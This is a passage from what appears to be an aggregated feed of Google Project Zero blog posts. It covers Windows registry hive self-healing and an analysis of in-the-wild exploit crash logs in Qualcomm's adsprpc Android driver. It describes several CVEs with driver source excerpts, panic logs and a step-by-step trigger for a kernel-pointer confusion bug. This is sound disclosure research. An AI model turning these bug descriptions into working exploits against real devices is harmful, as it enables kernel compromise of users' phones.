    • Deletion of entire subkey index: if any irrecoverable problem is found in a subkey index, it is deleted, and the subkey list of its associated key is cleared.
    • Security descriptor list reset: if any errors are detected in the list of security descriptors (bad Flink/Blink indexes or invalid binary format), the set of descriptors in the hive is reduced to the single root descriptor, which will then be inherited by all the keys in the hive.
    • Rejection of entire hive: if any issues are found with the fundamental parts of the regf format or its properties (heavily corrupted header, missing bins, invalid root key, invalid root security descriptor), the loading of the hive is completely aborted.

    As we can see, Windows implements a very defensive strategy and always attempts to either fix the corrupted data, or isolate the damage by deleting the affected object while preserving the overall hive integrity. Only when these repair attempts are exhausted does the kernel abort the loading process and return an error. This resilience can lead to situations where a freshly loaded hive is already in a "dirty" state, requiring the system to immediately flush its self-applied corrections to disk to maintain consistency.

    One particularly interesting bug related to the self-healing process was CVE-2023-38139. To reproduce the issue, the self-healing logic would have to be triggered a large number of times (in the case of my PoC, 65535 times) in order to cause a 32-bit integer overflow of a security descriptor refcount, and later a UAF condition. I have also abused the behavior to demonstrate WinRegLowSeverityBugs #13, in which a key with an empty name would be removed during load, freeing up a reference to a security descriptor and resulting in the refcount being equal to zero upon loading. Overall, the self-healing property of the registry is not the most critical, but one that I find quite fascinating and certainly worth keeping in mind as part of one's toolbox when researching this subsystem.

    Conclusion

    Congratulations on reaching the end! This post aimed to systematically explore the inner workings of the regf format, focusing on the hard requirements enforced by Windows. Due to my role and interests, I looked at the format from a strictly security-oriented angle rather than digital forensics, which is the context in which registry hives are typically considered. Hopefully, this deep dive clarifies some of the intricacies of the hive format and complements existing unofficial documentation.

    Keep in mind that hives store their data in the regf files on disk, but Windows also creates multiple auxiliary kernel objects for managing and caching this data once loaded. The next post in the series will discuss these various objects, their relationships, lifecycle, and, naturally, their impact on system security. Stay tuned!

    • ✇Project Zero
    • The Qualcomm DSP Driver - Unexpectedly Excavating an Exploit Google Project Zero
      Posted by Seth Jenkins, Google Project ZeroThis blog post provides a technical analysis of exploit artifacts provided to us by Google's Threat Analysis Group (TAG) from Amnesty International. Amnesty’s report on these exploits is available here. Thanks to both Amnesty International and Google's Threat Analysis Group for providing the artifacts and collaborating on the subsequent technical analysis!IntroductionEarlier this year, Google's TAG received some kernel panic logs generated by an In-the-
       

    The Qualcomm DSP Driver - Unexpectedly Excavating an Exploit

    16 de Dezembro de 2024, 03:11

    Posted by Seth Jenkins, Google Project Zero

    This blog post provides a technical analysis of exploit artifacts provided to us by Google's Threat Analysis Group (TAG) from Amnesty International. Amnesty’s report on these exploits is available here. Thanks to both Amnesty International and Google's Threat Analysis Group for providing the artifacts and collaborating on the subsequent technical analysis!

    Introduction

    Earlier this year, Google's TAG received some kernel panic logs generated by an In-the-Wild (ITW) exploit. Those logs kicked off a bug hunt that led to the discovery of 6 vulnerabilities in one Qualcomm driver over the course of 2.5 months, including one issue that TAG reported as ITW. This blog post covers the details of the original artifacts, each of the bugs discovered, and the hypothesized ITW exploit strategy gleaned from the logs.

    Artifacts

    Usually when successfully reverse-engineering an ITW exploit, Project Zero/TAG have had access to the exploit sample itself, making determining what vulnerability was exploited primarily a matter of time and effort. However, in this particular case, we received several kernel panic logs but unfortunately not the exploit sample. This meant we could not directly reproduce crashes or reverse engineer what bug was being exploited.

    Accurately determining what vulnerability an exploit uses working only off of crash logs and without the exploit itself can range in difficulty from highly plausible to impossible. I decided to give it a try and see what I could learn. Out of the 6 panics we received, 4 panics in particular contained potentially useful information:

    Log 1:

    [   47.223480] adsprpc: fastrpc_init_process: untrusted app trying to attach to privileged DSP PD

    [   47.254494] adsprpc: mapping not found to unmap fd 0xffffffff, va 0xffffffffffffffff, len 0xffffffff

    [   47.254512] adsprpc: falcon: fastrpc_internal_mmap: ERROR: adding user allocated pages is not supported

    [   47.261488] adsprpc: mapping not found to unmap fd 0xa, va 0x0, len 0x0

    ...

    [   50.865579] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000

    [   50.865586] Mem abort info:

    [   50.865590]   ESR = 0x96000006

    [   50.865593]   Exception class = DABT (current EL), IL = 32 bits

    [   50.865597]   SET = 0, FnV = 0

    [   50.865600]   EA = 0, S1PTW = 0

    [   50.865603] Data abort info:

    [   50.865606]   ISV = 0, ISS = 0x00000006

    [   50.865609]   CM = 0, WnR = 0

    [   50.865614] user pgtable: 4k pages, 39-bit VAs, pgdp = 00000000f66703d3

    [   50.865617] [0000000000000000] pgd=0000000213147003, pud=0000000213147003, pmd=0000000000000000

    [   50.865624] Internal error: Oops: 96000006 [#1] PREEMPT SMP

    ...

    [   50.865649] Process falcon (pid: 8909, stack limit = 0x000000000e91af69)

    [   50.865654] CPU: 5 PID: 8909 Comm: falcon Tainted: G S      W  O      4.19.157-perf-g8779875ad741 #1

    [   50.865657] Hardware name: Qualcomm Technologies, Inc. xiaomi apollo (DT)

    [   50.865661] pstate: 00400005 (nzcv daif +PAN -UAO)

    [   50.865669] pc : __list_del_entry_valid+0x34/0xd0

    [   50.865672] lr : dma_buf_detach+0x34/0xa0

    [   50.865675] sp : ffffff802c7bb990

    ...

    [   50.865735] Call trace:

    [   50.865739]  __list_del_entry_valid+0x34/0xd0

    [   50.865742]  dma_buf_detach+0x34/0xa0

    [   50.865746]  fastrpc_mmap_free+0x3e8/0x4d0

    [   50.865749]  fastrpc_file_free+0x1a8/0x2e0

    [   50.865753]  fastrpc_device_release+0x50/0x68

    [   50.865757]  __fput+0xb8/0x1b0

    [   50.865762]  ____fput+0xc/0x18

    [   50.865764]  task_work_run+0x8c/0xb0

    [   50.865767]  do_exit+0x3fc/0xa10

    [   50.865770]  do_group_exit+0x8c/0xa0

    [   50.865773]  get_signal+0x7c8/0x958

    [   50.865778]  do_notify_resume+0x148/0x23e8

    [   50.865781]  work_pending+0x8/0x10

    [   50.865785] Code: f9400669 91040042 eb02013f 54000260 (f9400122)

    [   50.865789] ---[ end trace 42c589b65f43d4ee ]---

    [   50.865802] Kernel panic - not syncing: Fatal exception

    We see right away from the first panic that the exploit appears to be targeting a driver called adsprpc. We also see from the stacktrace that the crash is happening when freeing a fastrpc_mmap struct - so it seems likely this is a heap exploit of some sort, and that a fastrpc_mmap struct is potentially involved.

    Log 2:

    [   37.450199] adsprpc: fastrpc_init_process: untrusted app trying to attach to privileged DSP PD

    [   37.482741] adsprpc: mapping not found to unmap fd 0xffffffff, va 0xffffffffffffffff, len 0xffffffff

    [   37.482759] adsprpc: falcon: fastrpc_internal_mmap: ERROR: adding user allocated pages is not supported

    [   37.486210] adsprpc: mapping not found to unmap fd 0xa, va 0x0, len 0x0

    ...

    [   40.917577] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702834303, err:-44

    ...

    [   41.970037] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702834303, err:-44

    ...

    [   51.052781] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702834303, err:-44

    ...

    [   73.964765] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702834303, err:-44

    ...

    [   83.030394] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702834303, err:-44

    ...

    [   86.358103] Unable to handle kernel paging request at virtual address 0035fb968c5d536d

    [   86.358118] Mem abort info:

    [   86.358122]   ESR = 0x96000044

    [   86.358127]   Exception class = DABT (current EL), IL = 32 bits

    [   86.358131]   SET = 0, FnV = 0

    [   86.358135]   EA = 0, S1PTW = 0

    [   86.358139] Data abort info:

    [   86.358143]   ISV = 0, ISS = 0x00000044

    [   86.358147]   CM = 0, WnR = 1

    [   86.358151] [0035fb968c5d536d] address between user and kernel address ranges

    [   86.358159] Internal error: Oops: 96000044 [#1] PREEMPT SMP

    ...

    [   86.358221] Process falcon (pid: 7053, stack limit = 0x00000000a7dfa97f)

    [   86.358230] CPU: 0 PID: 7053 Comm: falcon Tainted: G S         O      4.19.157-perf-g8779875ad741 #1

    [   86.358235] Hardware name: Qualcomm Technologies, Inc. xiaomi apollo (DT)

    [   86.358241] pstate: 60400005 (nZCv daif +PAN -UAO)

    [   86.358259] pc : fastrpc_file_free+0x1c4/0x2e0

    [   86.358264] lr : fastrpc_file_free+0x198/0x2e0

    [   86.358268] sp : ffffff80264d3a50

    ...

    [   86.358352] Call trace:

    [   86.358359]  fastrpc_file_free+0x1c4/0x2e0

    [   86.358364]  fastrpc_device_release+0x50/0x68

    [   86.358374]  __fput+0xb8/0x1b0

    [   86.358380]  ____fput+0xc/0x18

    [   86.358387]  task_work_run+0x8c/0xb0

    [   86.358394]  do_exit+0x3fc/0xa10

    [   86.358399]  do_group_exit+0x8c/0xa0

    [   86.358405]  get_signal+0x7c8/0x958

    [   86.358412]  do_notify_resume+0x148/0x23e8

    [   86.358418]  work_pending+0x8/0x10

    [   86.358424] Code: b4ffff68 f9400009 f9000109 b4fffee9 (f9000528)

    [   86.358430] ---[ end trace 9b01c55ca2d0bfea ]---

    [   86.358452] Kernel panic - not syncing: Fatal exception

    Here’s another crash in the adsprpc driver, this time associated with a fastrpc_file struct which is associated with a struct file which itself is the backing object referenced by a file descriptor. We also see that the exploit appears to have gotten farther in the exploit process this time and was making multiple calls to fastrpc_mmap_free. Notably the channel id is set to this very large value: 1702834303. Channel id’s can’t usually be set this high. While the maximum value varies from version to version, valid channel ids are in the range from 0 to about 6, so it’s clear that there is somehow memory corruption of the channel id (cid). It is also notable that the channel id value is set to a Unix epoch timestamp value - something Donncha of Amnesty noticed in the course of investigation. 1702834303 represents the date Sunday, December 17, 2023 5:31:43 PM which is quite close to when the exploit was thrown…why could this be?

    Log 3:

    [ 2244.639158] adsprpc: ERROR: fastrpc_internal_mmap: user application falcon trying to map without initialization

    ...

    [ 2244.641272] adsprpc: falcon: fastrpc_init_process: ERROR: donated memory allocated in userspace

    [ 2244.683779] adsprpc: mapping not found to unmap fd 0xffffffff, va 0xffffffffffffffff, len 0xffffffff

    [ 2244.683794] adsprpc: falcon: fastrpc_internal_mmap: ERROR: adding user allocated pages is not supported

    [ 2244.689633] adsprpc: mapping not found to unmap fd 0x9, va 0x0, len 0x0

    [ 2247.159424] Unable to handle kernel paging request at virtual address 006f7778a9cf5b88

    [ 2247.159442] Mem abort info:

    [ 2247.159446]   ESR = 0x96000004

    [ 2247.159453]   Exception class = DABT (current EL), IL = 32 bits

    [ 2247.159458]   SET = 0, FnV = 0

    [ 2247.159462]   EA = 0, S1PTW = 0

    [ 2247.159468] Data abort info:

    [ 2247.159472]   ISV = 0, ISS = 0x00000004

    [ 2247.159476]   CM = 0, WnR = 0

    [ 2247.159481] [006f7778a9cf5b88] address between user and kernel address ranges

    [ 2247.159489] Internal error: Oops: 96000004 [#1] PREEMPT SMP

    ...

    [ 2247.159572] Process falcon (pid: 17512, stack limit = 0x00000000c911fea5)

    [ 2247.159582] CPU: 0 PID: 17512 Comm: falcon Tainted: G S      W  O      4.19.157-perf-g8779875ad741 #1

    [ 2247.159587] Hardware name: Qualcomm Technologies, Inc. xiaomi apollo (DT)

    [ 2247.159595] pstate: 60400005 (nZCv daif +PAN -UAO)

    [ 2247.159614] pc : __kmalloc+0x1c4/0x398

    [ 2247.159619] lr : __kmalloc+0x60/0x398

    [ 2247.159623] sp : ffffff8029173b80

    ...

    [ 2247.159719] Call trace:

    [ 2247.159727]  __kmalloc+0x1c4/0x398

    [ 2247.159740]  inotify_handle_event+0xc8/0x1c8

    [ 2247.159746]  fsnotify+0x270/0x378

    [ 2247.159753]  __fsnotify_parent+0xdc/0x138

    [ 2247.159763]  notify_change2+0x314/0x348

    [ 2247.159771]  do_sys_ftruncate+0x190/0x1c0

    [ 2247.159776]  __arm64_sys_ftruncate+0x1c/0x28

    [ 2247.159786]  el0_svc_common+0x98/0x160

    [ 2247.159792]  el0_svc_handler+0x68/0x80

    [ 2247.159800]  el0_svc+0x8/0xc

    [ 2247.159808] Code: b4000a77 b940230a f940bf0b 8b0a02ea (f940014c)

    [ 2247.159815] ---[ end trace 3729c600fbf1ba28 ]---

    [ 2247.159842] Kernel panic - not syncing: Fatal exception

    Again we see adsprpc driver logs, but it culminates in a crash within the context of the exploit process in a different part of the code entirely - this time from the inotify subsystem. We will revisit the importance of this crash later.

    Log 4:

    [   67.167510] adsprpc: fastrpc_init_process: untrusted app trying to attach to privileged DSP PD

    [   67.202061] adsprpc: mapping not found to unmap fd 0xffffffff, va 0xffffffffffffffff, len 0xffffffff

    [   67.202084] adsprpc: falcon: fastrpc_internal_mmap: ERROR: adding user allocated pages is not supported

    [   67.207916] adsprpc: mapping not found to unmap fd 0xa, va 0x0, len 0x0

    [   69.577152] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702832054, err:-44

    [   70.621863] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702832054, err:-44

    ...

    [   79.689300] adsprpc: ERROR:fastrpc_mmap_free, Invalid channel id: 1702832054, err:-44

    ...

    [   97.574406] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000009

    [   97.574435] Mem abort info:

    [   97.574445]   ESR = 0x96000006

    [   97.574457]   Exception class = DABT (current EL), IL = 32 bits

    [   97.574467]   SET = 0, FnV = 0

    [   97.574476]   EA = 0, S1PTW = 0

    [   97.574485] Data abort info:

    [   97.574495]   ISV = 0, ISS = 0x00000006

    [   97.574504]   CM = 0, WnR = 0

    [   97.574522] user pgtable: 4k pages, 39-bit VAs, pgdp = 00000000ad40fd5a

    [   97.574532] [0000000000000009] pgd=00000001cadcb003, pud=00000001cadcb003, pmd=0000000000000000

    [   97.574554] Internal error: Oops: 96000006 [#1] PREEMPT SMP

    ...

    [   97.574680] Process falcon (pid: 10050, stack limit = 0x00000000eac9e565)

    [   97.574700] CPU: 0 PID: 10050 Comm: falcon Tainted: G S         O      4.19.157-perf-g8779875ad741 #1

    [   97.574711] Hardware name: Qualcomm Technologies, Inc. xiaomi apollo (DT)

    [   97.574726] pstate: 00400005 (nzcv daif +PAN -UAO)

    [   97.574756] pc : pipe_read+0xac/0x308

    [   97.574769] lr : pipe_read+0x4c/0x308

    [   97.574778] sp : ffffff802e43bc80

    ...

    [   97.574982] Call trace:

    [   97.574996]  pipe_read+0xac/0x308

    [   97.575014]  __vfs_read+0xf8/0x140

    [   97.575027]  vfs_read+0xb8/0x150

    [   97.575039]  ksys_read+0x6c/0xd0

    [   97.575053]  __arm64_sys_read+0x18/0x20

    [   97.575071]  el0_svc_common+0x98/0x160

    [   97.575083]  el0_svc_handler+0x68/0x80

    [   97.575097]  el0_svc+0x8/0xc

    [   97.575114] Code: aa1c03fb aa1c03e1 b840ce68 f8410f69 (f9400529)

    [   97.575127] ---[ end trace 72c08623f6dedcd7 ]---

    [   97.575174] Kernel panic - not syncing: Fatal exception

    We see here a fourth type of crash, this time in the pipe subsystem. Pipe buffers are often used as a spray object for heap exploitation, and it wouldn’t be terribly surprising if that were the case here.

    There are several valuable pieces of information to glean from the logs - the most meaningful being the usage of this adsprpc driver. We also see log lines from several adsprpc functions:

    • fastrpc_init_process
    • fastrpc_internal_munmap_fd
    • fastrpc_internal_mmap
    • fastrpc_mmap_free

    It is likely the bug used by the attacker resides somewhere in the relationships between these functions, but exactly where is not clear from the logs alone. The functions that are executed by the exploit only serve to complicate the investigation, as the exploit seems to constantly hit very early bailouts that shouldn’t cause any change in kernel state whatsoever.

    Upon additional investigation (by Jann Horn in particular!) it became clear that this driver is accessible from a spectrum of unprivileged contexts. untrusted_app does not have the ability to directly open the driver device file, but at least on some devices it can obtain limited access by receiving a file descriptor to the device file from the dspservice process through the IDspService HAL interface, which is reachable through hwbinder.

    As we’ve seen before, third-party Android drivers are appealingly buggy attack surfaces, regularly containing a reservoir of potential vulnerabilities for attackers. While it wasn’t immediately clear what vulnerability the attackers had exploited, it was clear that performing a more thorough audit of this driver was warranted.

    The adsprpc Driver

    The Application Digital Signal Processor Remote Procedure Call driver (or adsprpc for short) is primarily used for offloading multimedia processing to a more efficient DSP co-processor core. The driver is primarily accessed through the /dev/adsprpc-smd character device file although historically it could be reached via a variety of device files including cdsprpc-smd and mdsprpc-smd. The driver’s architecture is helpfully thoroughly described in the kernel documentation. Through this driver, co-processor routines are exposed to the application processor userland (including untrusted_app processes) via an RPC interface, providing an efficient abstraction methodology by which multimedia processing can be offloaded to the specialized hardware in the SoC. Through the use of DMA buffers that are mapped directly onto the DSP core, adsprpc looks to minimize the amount of data copied across the processor boundary. This featureset is necessarily complex, and that makes it a ripe target for in-depth security research.

    The Bughunt Begins

    Having given up on discovering the bug exploited in the ITW logs directly, it was time to start a broader code review process. This turned out to be a very productive research decision. Jann found the first bug quite quickly, and over the course of the next several months, I found 5 more. I’ve described each of the bugs below.

    CVE-2024-38402: refcount leak leading to UAF in fastrpc_get_process_gids

    The first discovered vulnerability in the driver is a refcount leak of the group_info struct associated with the task that leads to a UAF. In the function fastrpc_get_process_gids, get_current_groups is called which increments a refcount on the group_info struct, but that refcount is never dropped. Furthermore, this refcount is a non-saturating refcount which makes it possible to overflow if you execute fastrpc_get_process_gids approximately 2^32 times. This is a difficult bug to exploit in practice, taking at least 14 hours to trigger, but it’s nevertheless memory corruption with all the associated consequences. An example crash from this issue is below:

    [77306.174599] [7:           adbd: 5455] BUG: KFENCE: invalid read in groups_to_user+0x34/0x1a4 

     

    [77306.174606] [7:           adbd: 5455] Invalid read at 0xffffff89572a0000: 

    [77306.174607] [7:           adbd: 5455]  groups_to_user+0x34/0x1a4 

    [77306.174609] [7:           adbd: 5455]  invoke_syscall+0x58/0x13c 

    [77306.174612] [7:           adbd: 5455]  el0_svc_common+0xb4/0xf0 

    [77306.174614] [7:           adbd: 5455]  do_el0_svc+0x24/0x90 

    [77306.174615] [7:           adbd: 5455]  el0_svc+0x20/0x7c 

    [77306.174617] [7:           adbd: 5455]  el0t_64_sync_handler+0x84/0xe4 

    [77306.174618] [7:           adbd: 5455]  el0t_64_sync+0x1b8/0x1bc 

    [77306.174620] [7:           adbd: 5455]   

    [77306.174621] [7:           adbd: 5455] CPU: 7 PID: 5455 Comm: adbd Tainted: G S      W  OE     5.15.123-android13-8-28577312-abS911BXXU3CXD3 #1 

    [77306.174623] [7:           adbd: 5455] Hardware name: Samsung DM1Q PROJECT (board-id,13) (DT) 

    [77306.174624] [7:           adbd: 5455] pstate: 22400005 (nzCv daif +PAN -UAO +TCO -DIT -SSBS BTYPE=--) 

    [77306.174626] [7:           adbd: 5455] pc : groups_to_user+0x34/0x1a4 

    [77306.174628] [7:           adbd: 5455] lr : __arm64_sys_getgroups+0x4c/0x6c 

    [77306.174629] [7:           adbd: 5455] sp : ffffffc02a073e00 

    [77306.174630] [7:           adbd: 5455] x29: ffffffc02a073e00 x28: ffffff8868030040 x27: 0000000000000000 

    [77306.174633] [7:           adbd: 5455] x26: 0000000000000000 x25: 0000000000000000 x24: 0000000000000000 

    [77306.174635] [7:           adbd: 5455] x23: 0000000060001000 x22: 00000077219a4f2c x21: ffffff8868030040 

    [77306.174637] [7:           adbd: 5455] x20: ffffffc0081bd46c x19: 000000006b6b6b6b x18: ffffffc016089000 

    [77306.174638] [7:           adbd: 5455] x17: 000000000000fffe x16: b4000074e392f638 x15: ffffff895729fff8 

    [77306.174640] [7:           adbd: 5455] x14: 00000000524e68f8 x13: ffffff8868030040 x12: ffffffc00ad82000 

    [77306.174641] [7:           adbd: 5455] x11: 0000007fffffffff x10: ffffffc00aa93000 x9 : 0000000014939a3e 

    [77306.174643] [7:           adbd: 5455] x8 : 000000006b6b6b6b x7 : 0000000000000000 x6 : 0000000000000000 

    [77306.174645] [7:           adbd: 5455] x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 

    [77306.174646] [7:           adbd: 5455] x2 : 0000000000000040 x1 : ffffff8904db9700 x0 : b400007491448d40 

    [77306.174648] [7:           adbd: 5455] Call trace: 

    [77306.174648] [7:           adbd: 5455]  groups_to_user+0x34/0x1a4 

    [77306.174650] [7:           adbd: 5455]  invoke_syscall+0x58/0x13c 

    [77306.174651] [7:           adbd: 5455]  el0_svc_common+0xb4/0xf0 

    [77306.174653] [7:           adbd: 5455]  do_el0_svc+0x24/0x90 

    [77306.174654] [7:           adbd: 5455]  el0_svc+0x20/0x7c 

    [77306.174655] [7:           adbd: 5455]  el0t_64_sync_handler+0x84/0xe4 

    [77306.174656] [7:           adbd: 5455]  el0t_64_sync+0x1b8/0x1bc 

    CVE-2024-21455: is_compat flag leads to access of userland provided addresses as kernel pointers

    In order to support 32-bit userland processes, 64-bit kernels contain a “compatibility layer” that ioctls can support. This layer is responsible for marshaling over 32-bit structs into their 64-bit equivalents which involves upcasting 32-bit userland pointers into 64-bit pointers. The adsprpc driver handles this case in the adsprpc_compat.c file. It allocates kernel memory, copies and converts the 32-bit struct into that kernel memory as a 64-bit struct, and then calls the 64-bit ioctl interface. The 64-bit ioctl interface thus needs to handle calls coming from both the 32-bit kernel compatibility layer and from 64-bit userland. In order to provide this support, the 32-bit compatibility layer indicates to the broader adsprpc driver that the 32-bit compatibility layer is in use by setting a flag is_compat in the file-descriptor-bound fl struct.

    long compat_fastrpc_device_ioctl(struct file *filp, unsigned int cmd,

                                    unsigned long arg)

    {

            int err = 0;

            struct fastrpc_file *fl = (struct fastrpc_file *)filp->private_data;

            if (!filp->f_op || !filp->f_op->unlocked_ioctl)

                    return -ENOTTY;

            fl->is_compat = true;

    ...

    }

    Later on, that is_compat flag is used in calls to K_COPY_FROM_USER to make decisions about whether to use memmove (32-bit compatibility layer or other kernel invocation) or copy_from_user.

    #define K_COPY_FROM_USER(err, kernel, dst, src, size) \

            do {\

                    if (!(kernel))\

                            err = copy_from_user((dst),\

                            (void const __user *)(src),\

                            (size));\

                    else\

                            memmove((dst), (src), (size));\

            } while (0)

    ...
    int
     fastrpc_internal_invoke2(struct fastrpc_file *fl,

                                    struct fastrpc_ioctl_invoke2 *inv2)

    {

    switch (inv2->req) {

            case FASTRPC_INVOKE2_ASYNC:

                    ...

                            K_COPY_FROM_USER(err, fl->is_compat, &p.inv3, (void*)inv2->invparam, sizeof(struct fastrpc_ioctl_invoke_async_no_perf));

    ...

    }

    However, this flag is set at a relatively global level in that any other ioctl calls on the same file descriptor will see that this flag is set. Furthermore, once the flag is set, it is never UNset. Consider the following scenario:

    1. A malicious 64-bit process A opens the adsprpc-smd file, creating a new adsprpc file descriptor
    2. Process A forks and creates a new 32-bit process B (A and B share the adsprpc fd/fl)
    3. Process B invokes the 32-bit ioctl interface (thusly setting the is_compat flag) and exits
    4. Process A invokes the 64-bit ioctl interface

    In this circumstance, the driver incorrectly thinks that the request is coming from the 32-bit compatibility layer (since is_compat is set) and that it should access the struct as if it contained kernel pointers while it is in fact a request coming from 64-bit userland containing untrusted userland-provided pointers (which could in a malicious case be kernel pointers!). The kernel will subsequently use an unsafe memmove to access these pointers, leading to userland controlled reads of kernel addresses.

    [49468.514358] Unable to handle kernel paging request at virtual address ffffffff41414141

    [49468.514397] PC Code: d65f03c0 d503201f (a9401c26) a9412428

    [49468.514407] LR Code: 340003a8 957474dd (f9401be8) f90023e8

    [49468.514413] Mem abort info:

    [49468.514418] ESR = 0x96000005

    [49468.514426] EC = 0x25: DABT (current EL), IL = 32 bits

    [49468.514433] SET = 0, FnV = 0

    [49468.514440] EA = 0, S1PTW = 0

    [49468.514445] FSC = 0x05: level 1 translation fault

    [49468.514452] Data abort info:

    [49468.514456] ISV = 0, ISS = 0x00000005

    [49468.514463] CM = 0, WnR = 0

    [49468.514469] swapper pgtable: 4k pages, 39-bit VAs, pgdp=00000000aa728000

    [49468.514479] [ffffffff41414141] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000

    [49468.514502] Internal error: Oops: 96000005 [#1] PREEMPT SMP

    [49468.514780] sec_arm64_ap_context:sec_arm64_ap_context_on_die() context saved (CPU:6)

    [49468.514788] Modules linked in: [...]

    [49468.516301] CPU: 6 PID: 17448 Comm: poc_compat_pare Tainted: G S      W  OE     5.15.123-android13-8-28577312-abS911BXXU3CXD3 #1

    [49468.516312] Hardware name: Samsung DM1Q PROJECT (board-id,13) (DT)

    [49468.516317] pstate: 22400005 (nzCv daif +PAN -UAO +TCO -DIT -SSBS BTYPE=--)

    [49468.516326] pc : __memcpy+0x90/0x250

    [49468.516339] lr : fastrpc_internal_invoke2+0x308/0x408 [frpc_adsprpc]

    [49468.516471] sp : ffffffc02fe33ba0

    [49468.516475] x29: ffffffc02fe33cb0 x28: ffffff894341bb80 x27: 0000000000000000

    [49468.516489] x26: 0000000000000000 x25: 0000000000000000 x24: ffffff891fe6c5c0

    [49468.516499] x23: 00000000ffffffe7 x22: ffffff8939eff010 x21: 00000000c0185212

    [49468.516510] x20: 0000007fe5890e40 x19: ffffff8939eff000 x18: ffffffc017b37010

    [49468.516520] x17: 0000000000000000 x16: 0000000000000000 x15: 0000007fe5890e40

    [49468.516530] x14: ffffff80011f6480 x13: 0000000000000000 x12: ffffff8034b27ce8

    [49468.516540] x11: 0000000000000010 x10: ffffffc002443654 x9 : 0000000000000008

    [49468.516549] x8 : 0000000000000001 x7 : 0000000000000001 x6 : ffffffc02fe33d30

    [49468.516559] x5 : ffffffc02fe33bd8 x4 : ffffffff41414171 x3 : 0000000000000008

    [49468.516568] x2 : 0000000000000030 x1 : ffffffff41414141 x0 : ffffffc02fe33ba8

    [49468.516577] Call trace:

    [49468.516582] __memcpy+0x90/0x250

    [49468.516593] fastrpc_device_ioctl+0x1b0/0x92c [frpc_adsprpc]

    [49468.516716] __arm64_sys_ioctl+0x120/0x170

    [49468.516734] invoke_syscall+0x58/0x13c

    [49468.516745] el0_svc_common+0xb4/0xf0

    [49468.516753] do_el0_svc+0x24/0x90

    [49468.516760] el0_svc+0x20/0x7c

    [49468.516771] el0t_64_sync_handler+0x84/0xe4

    [49468.516778] el0t_64_sync+0x1b8/0x1bc

    [49468.516790] Code: 382e6808 381ff0aa d65f03c0 d503201f (a9401c26)

    [49468.516799] ---[ end trace 9c87e0f40bf8f469 ]---

    This could plausibly be elevated directly into an arbitrary kernel read primitive.

    Understanding the fastrpc_mmap struct

    The adsprpc driver maintains some internal bookkeeping on what DMA buffers are mapped onto the co-processor via fastrpc_mmap structs. These structs are allocated and initialized in fastrpc_mmap_create and contain several characteristics that substantially complicate management of these objects. They can be on either an fl (associated with a struct file) local or global linked list, depending on the flags used on creation. They have two separate refcounts refs and ctx_refs and they can be referenced from multiple places at once, including a context (an object that tracks data associated with a single RPC call), the global or local map lists, and of course transient stack-based references when being created or destroyed. A reference on an existing map is taken when fastrpc_mmap_create is called with a set of parameters that are fulfilled by an existing mapping.

    fastrpc_mmap objects can be created via several different codepaths. This includes during context initialization, by accessing two different dedicated ioctl handlers, during DSP initialization and process creation, and even by a request from the DSP itself. fastrpc_mmap objects can be freed through a reciprocal set of codepaths such as context or struct file teardown, and via three different dedicated unmapping ioctls. We will examine several of these creation and destruction codepaths as I discuss three discovered bugs involving use-after-free of a fastrpc_mmap_struct.

    CVE-2024-33060: UAF race of global maps in fastrpc_mmap_create (and epilogue functions)

    It is important to have a good understanding of the locking utilized for protecting these map lists from races in order to understand the first bug found:

    int fastrpc_internal_mem_map(struct fastrpc_file *fl,

                                    struct fastrpc_ioctl_mem_map *ud)

    {

            int err = 0;

            struct fastrpc_mmap *map = NULL;

            mutex_lock(&fl->internal_map_mutex);

            ...

            mutex_lock(&fl->map_mutex);

            VERIFY(err, !(err = fastrpc_mmap_create(fl, ud->m.fd, NULL, ud->m.attrs,

                            ud->m.vaddrin, ud->m.length,

                             ud->m.flags, &map)));

            mutex_unlock(&fl->map_mutex);

            if (err)

                    goto bail;

    ...
            
    //[1] map may already be globally visible

    VERIFY(err, !(err = fastrpc_mem_map_to_dsp(fl, ud->m.fd, ud->m.offset,

                    ud->m.flags, map->va, map->phys, map->size, &map->raddr)));

    if (err)

            goto bail;

    ud->m.vaddrout = map->raddr;

    bail:

            if (err) {

                    if (map) {

                            mutex_lock(&fl->map_mutex);

                            fastrpc_mmap_free(map, 0);

                            mutex_unlock(&fl->map_mutex);

                    }

            }

            mutex_unlock(&fl->internal_map_mutex);

            return err;

    }

    Two mutexes are held here, one of which is held throughout the lifetime of the function including in the error condition bailout: fl->map_mutex and fl->internal_map_mutex. Both of these mutexes are bound to the fl struct which is itself bound to the struct file associated with a file descriptor. These mutexes prevent concurrency for e.g. multiple fastrpc_internal_mem_map calls on the same file descriptor, but do not prevent concurrency with other fl structs (e.g. from a second open’d adsprpc-smd file descriptor) being utilized in the same ioctls. As these ioctls are often used to administer fl struct local maps, global concurrency is often okay. However fastrpc_mmap_create and fastrpc_internal_mem_map can create global maps too. And for global maps that are added to global structures, global mutexing is only briefly taken in fastrpc_internal_mem_map -> fastrpc_mmap_create -> fastrpc_mmap_add:

    static void fastrpc_mmap_add(struct fastrpc_mmap *map)

    {

            if (map->flags == ADSP_MMAP_HEAP_ADDR ||

                                    map->flags == ADSP_MMAP_REMOTE_HEAP_ADDR) {

                    struct fastrpc_apps *me = &gfa; //gfa is a global struct

                    unsigned long irq_flags = 0;

                    spin_lock_irqsave(&me->hlock, irq_flags); //Taken here

                    hlist_add_head(&map->hn, &me->maps);

                    spin_unlock_irqrestore(&me->hlock, irq_flags); //Dropped here

            } else {

                    struct fastrpc_file *fl = map->fl;

                    hlist_add_head(&map->hn, &fl->maps);

            }

    }

